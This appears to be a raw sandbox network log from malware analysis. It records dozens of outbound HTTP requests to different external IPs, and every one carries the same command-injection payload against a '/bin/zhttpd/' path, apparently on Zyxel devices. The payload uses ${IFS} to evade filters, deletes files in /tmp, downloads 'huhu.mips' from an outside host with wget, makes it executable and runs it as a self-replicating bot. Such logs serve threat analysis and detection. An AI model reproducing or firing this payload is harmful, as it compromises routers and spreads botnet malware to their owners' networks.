                                                      Feb 2, 2024 06:35:48.537079096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3276192.168.2.1442822142.10.194.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537127972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3277192.168.2.1434746204.167.129.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537168980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3278192.168.2.1434170181.50.114.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537199974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3279192.168.2.143490674.234.21.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537226915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3280192.168.2.1455884131.51.227.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537267923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3281192.168.2.1434116103.93.210.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537313938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3282192.168.2.144758627.153.215.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537348986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3283192.168.2.1447480122.245.151.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537394047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3284192.168.2.144895424.160.115.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537437916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3285192.168.2.145302274.212.73.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537492037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3286192.168.2.1457836172.243.98.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537525892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3287192.168.2.145809873.238.45.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537570953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3288192.168.2.14596202.102.197.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537609100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3289192.168.2.1452434197.44.36.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537652969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3290192.168.2.1435710219.135.103.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537687063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3291192.168.2.143511280.168.249.211443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537707090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3292192.168.2.1439522222.28.179.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537749052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3293192.168.2.143837012.210.104.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537792921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3294192.168.2.1460862101.57.151.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537830114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3295192.168.2.1449200160.203.22.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537868023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3296192.168.2.1450106207.96.223.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537882090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3297192.168.2.1449298163.32.159.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537919998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3298192.168.2.143501270.156.209.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537966013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3299192.168.2.1443610131.163.76.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.537995100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3300192.168.2.1459386205.63.143.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538047075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3301192.168.2.1449150146.158.126.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538091898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3302192.168.2.1455876115.250.25.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538117886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3303192.168.2.1435524212.149.120.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538165092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3304192.168.2.145073032.56.170.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538197041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3305192.168.2.143722637.79.231.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538233042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3306192.168.2.144585218.167.253.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538280010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3307192.168.2.144389288.85.234.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538316965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3308192.168.2.144546888.84.12.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538362026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3309192.168.2.145647460.15.157.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538400888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3310192.168.2.145105617.67.162.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538441896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3311192.168.2.1460976168.158.76.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538497925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3312192.168.2.145540685.183.198.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538522005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3313192.168.2.1437834143.19.197.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538590908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3314192.168.2.145706845.202.195.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538605928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3315192.168.2.143499675.206.89.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538651943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3316192.168.2.1448888124.105.135.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538697004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3317192.168.2.145338459.47.232.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538743019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3318192.168.2.145052486.75.51.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538778067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3319192.168.2.1450610206.24.67.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538815975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3320192.168.2.1445116207.244.30.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538856030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3321192.168.2.143772690.137.236.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538909912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3322192.168.2.144732481.240.81.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538937092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3323192.168.2.144008068.202.50.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.538990021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3324192.168.2.1437008188.123.142.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539020061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3325192.168.2.144084090.36.81.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539062977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3326192.168.2.1458466114.97.190.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539117098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3327192.168.2.144680843.137.66.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539143085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3328192.168.2.144210613.215.247.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539177895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3329192.168.2.1443094155.253.67.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539238930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3330192.168.2.1456320210.37.22.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539278030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3331192.168.2.144696823.142.177.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539326906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3332192.168.2.1432860104.248.17.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539370060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3333192.168.2.144938060.48.54.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539411068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3334192.168.2.1447820157.101.100.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539455891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3335192.168.2.1448714116.218.81.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539494991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3336192.168.2.143647018.179.133.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539535046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3337192.168.2.145343225.89.247.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:48.539571047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3338192.168.2.145389625.158.166.176443
                                                      TimestampBytes transferredDirectionData
